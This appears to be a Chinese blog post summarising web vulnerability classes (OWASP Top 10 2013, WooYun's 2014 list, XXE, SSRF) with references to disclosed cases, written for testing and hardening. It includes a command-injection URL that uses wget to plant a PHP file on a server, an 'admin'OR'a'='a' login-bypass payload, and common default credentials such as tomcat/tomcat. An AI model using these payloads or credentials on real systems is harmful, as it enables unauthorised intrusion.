Web漏洞群英荟萃

标签：style   blog   http   color   io   os   ar   使用   for   

0x00前言

　　做测试或安全加固时，手边如果没有一个类似于cheat sheet的东西，很可能视野会比较窄，只见树木不见树林。

　　简单整理了点东西，方便需要的时候自己参考，如果有需要的朋友刚好也看到本文，也是好事一件。

　　日后会针对这些漏洞一一整理相关借鉴资料，敬请期待

0x01 目录

　　0x00 前言

　　0x01 目录

　　0x02 OWASP TOP10 简单介绍

　　0x03 乌云TOP 10 简单介绍

　　0x04 非主流的WEB漏洞

0x02 OWASP TOP10 简单介绍

　　除了OWASP的TOP10，Web安全漏洞还有很多很多，在做测试和加固系统时也不能老盯着TOP10，实际上是TOP10中的那少数几个

　　先看一下2010和2013年TOP10：

　　直接说2013的：

　　A1: 注入，包括SQL注入、OS注入、LDAP注入。SQL注入最常见，没什么好说的，wooyun.org || http://packetstormsecurity.com 搜SQL注入不要太多

　　命令注入相对来说出现得较少，形式可以是：

　　https://1XX.202.234.22/debug/list_logfile.php?action=restartservice&bash=;wget -O /Isc/third-party/httpd/htdocs/index_bak.php http://xxphp.txt;

　　也可以查看案例：极路由云插件安装shell命令注入漏洞

　　直接搜索LDAP注入案例，简单尝试下并没有找到，关于LDAP注入的相关知识可以参考我整理的LDAP注入与防御解析。虽然没有搜到LDAP注入的案例，但是重要的LDAP信息 泄露还是挺多的，截至目前，乌云上搜关键词LDAP有81条记录。

　　A2: 失效的身份认证及会话管理，乍看身份认证觉得总归是和输入密码有关的，个人理解为弱口令或空口令：

　　案例1：空口令 　　

　　　　　　　　　　　乌云：国内cisco系列交换机空密码登入大集合

　　　　　　　　　　　乌云：UC某服务器可空口令访问数据库

　　案例2：弱口令

　　　　　　　　　　　乌云：盛大某站后台存在简单弱口令可登录　　admin/admin

　　　　　　　　　　　乌云：电信某省客服系统弱口令泄漏各种信息　.../123456

　　　　　　　　　　　乌云：中国建筑股份有限公司OA系统tomcat弱口令导致沦陷　　tomcat/tomcat

　　案例3：万能密码

　　　　　　　　　　　乌云：移动号码上户系统存在过滤不严　　admin‘OR‘a‘=‘a/admin‘OR‘a‘=‘a

　　弱口令案例实在不一而足

　　在乌云上翻了若干页，找到一些弱口令如下：其中出镜次数最高的是：admin/admin, admin/123456

　如果要继续深究下去或者取得更多数据进行分析的话，我猜结局就会如猪猪侠总结的那样：

　　对于A2来说，除了口令问题，会话存在的安全问题也是需要考虑的，可以是令牌、token被窃取，尤其当会话没有设置生命周期时很容易出现会话/身份被劫持

　　会话管理问题可以是用户A登陆了某个地址，但是没有注销(奇葩情况是注销无效)，直接退出了浏览器又没有清除cookie，如果说这时候有B借用A的电脑，他直接以A的身份登陆该地址是没有问题的，这不是服务端的问题。但假设之后A都没有访问改地址，而是把电脑合上待机了，第二天如果B借用他的电脑直接登陆了该地址，则责任在于服务端的会话管理不当，没有设置超时时间。除此之外，还有会话重放、会话信息泄露等问题，说到会话信息泄露，不禁想起将sessionid放在URL中的情形，要是万一cookie值就为sessionid，身份窃取可以说so easy啊。

　　A3: 跨站脚本(XSS)，SQL和XSS出镜率之高，其他漏洞简直望尘莫及

　　A4: 不安全的直接对象引用，访问控制不当的问题，常见为越权操作(横向+纵向)，譬如：遍历用户id批量获取用户信息、在HTTP请求中篡改某个参数的值就变成了其他身份进行的操作，最激动人心的是可以进行刷钱等操作

　　案例1：水平越权

　　　　　　　　　　乌云：虎扑某功能存在水平越权

　　案例2： 垂直越权

　　　　　　　　　　乌云：中国电信某系统管理员WEB界面越权访问

　　A5-A7\A9: 安全配置错误\敏感数据泄露\功能级访问控制缺失\使用含已知漏洞的组件=>运维不当，直接看运维不当的

　　　　　　　　　　知乎专栏：运维安全(...)

　　　　　　　　　　乌云知识库：从乌云看运维安全那点事儿

　　引用一下知识库的内容，问题有： 

struts漏洞
Web服务器未及时打补丁，有解析漏洞
PHP-CGI RCE
FCK编辑器
server-status信息泄露
网站备份文件放在web目录，可被下载
列目录导致可看到敏感数据并查看
snmp信息泄露
weblogic弱口令
SVN信息泄露
域传送漏洞
Rsync
hadoop对外
nagios信息泄露
ftp弱口令或支持匿名访问导致信息泄露
RTX泄露信息
Ganglia信息泄露
j2ee应用架构开始占主流，典型的web服务器搭配配置失误
Jenkins平台没有设置登录验证
zabbix
zenoss监控系统
Resin文件读取
memcache未限制访问IP
JBoss问题
测试服务器外网可访问
padding oracle attack
用户名密码放在服务器上……

　　A8: 跨站请求伪造(CSRF)

　　CSRF曾被称为沉睡的巨人，以前拿来举例时都是说Alice给Bob转钱，结果morry插了一脚，钱就跑到morry家去了。危害可大可小，直接通过URL增删改操作的也还有，更多的还是基于表单。如果是XSS+CSRF =>蠕虫 就比较可观了，也曾看到过直接get root的案例

　　案例：万达电影主站 xss + csrf

　　A10: 无效的重定向

　　控制重定向可以钓鱼，可以获取敏感文件的信息，在struts2中也有开放重定向的命令执行

0x03 乌云TOP 10 简单介绍

　　上述就是OWASP TOP10的WEB漏洞，乌云出了一个更加符合中国国情的 乌云：Top10 for 2014，看着也是触目惊心

　　A1-互联网泄密事件/撞库攻击

　　本质上来说是使用了不安全的口令，也许我可以将自己的密码设置的很复杂，别人破解不出来。但对于撞库攻击而言，可以说是不怕神一样的对手，就怕猪一样的队友。我们注册使用的网站或服务商他们保存了我们使用的密码，而很多时候被泄露出去了我们并不知道。这也是考验我们密码习惯的时候了，强密码+不同的密码，当然密码多了也难以记住，不行就借助软件或者普通账号用同一个密码，重要账号用不同密码吧

　　A2-引用不安全的第三方应用

　　　　举的例子是heart bleed漏洞使用的openssl，另外struts2的漏洞也还数见不鲜，其次就是CMS如wordpress使用的插件,当然shellshock也会有很多中枪的

　　A3-系统错误/逻辑缺陷带来的暴力猜解

　　　　暴力破解：没对请求和错误次数做限制；重放攻击同样是没做检验或限制

　　A4-敏感信息/配置信息泄露

　　　　包括但不限于目录遍历、日志、配置文件、svn目录、github或其他博客等地方

　　A5-应用错误配置/默认配置

　　　　包括但不限于默认路径、默认口令、目录穿越、任意文件下载等

　　A6-SQL注入漏洞

　　A7-XSS跨站脚本攻击/CSRF

　　A8-未授权访问/权限绕过

　　　　可匿名访问\判断referer值后免登陆

　　A9-账户体系控制不严/越权操作

　　A10-内部重要资料/文档外泄

　　　　还是信息泄露，但是做了区分，不同于应用或服务器的信息泄露，专指内部信息泄露哟

0x04 非主流的WEB漏洞

　　实际上，如果要挖漏洞或者做测试，从乌云上找案例会比较方便，除了常见的几类代码层面的问题，更多的是配置不当方面的，最终归结到信息安全链上最脆弱的还是人本身

　　除了上面提到的这些，其实还有很多的漏洞啊，跟设备有关系的就先不说了，再提一下两个看起来不错的：XXE、SSRF(or XSPA)

　　XXE：XML外部实体注入，敏感信息泄露

　　案例：

　　　　1. 乌云：百度某功能XML实体注入

　　　　2. 乌云：139邮箱XXE漏洞可读取文件

　　　　3. 乌云：从开源中国的某XXE漏洞到主站shell

　　SSRF(服务端请求伪造): 据说用这招可以成功多次进入阿里、腾讯、百度等的内网，没爆出来的估计很多被用作杀器了

　　案例：

　　　　1. 乌云：百度贴吧SSRF

　　　　2. 乌云：新浪SSRF

　　　　3. 乌云：阿里巴巴SSRF

　　上面几个案例有的是分享功能，有的是其他功能，共同点在于都是跟的url参数，且没做限制，导致内网信息泄露

　　（未完...）

Web漏洞群英荟萃

标签：style   blog   http   color   io   os   ar   使用   for   

原文地址：http://www.cnblogs.com/r00tgrok/p/4023361.html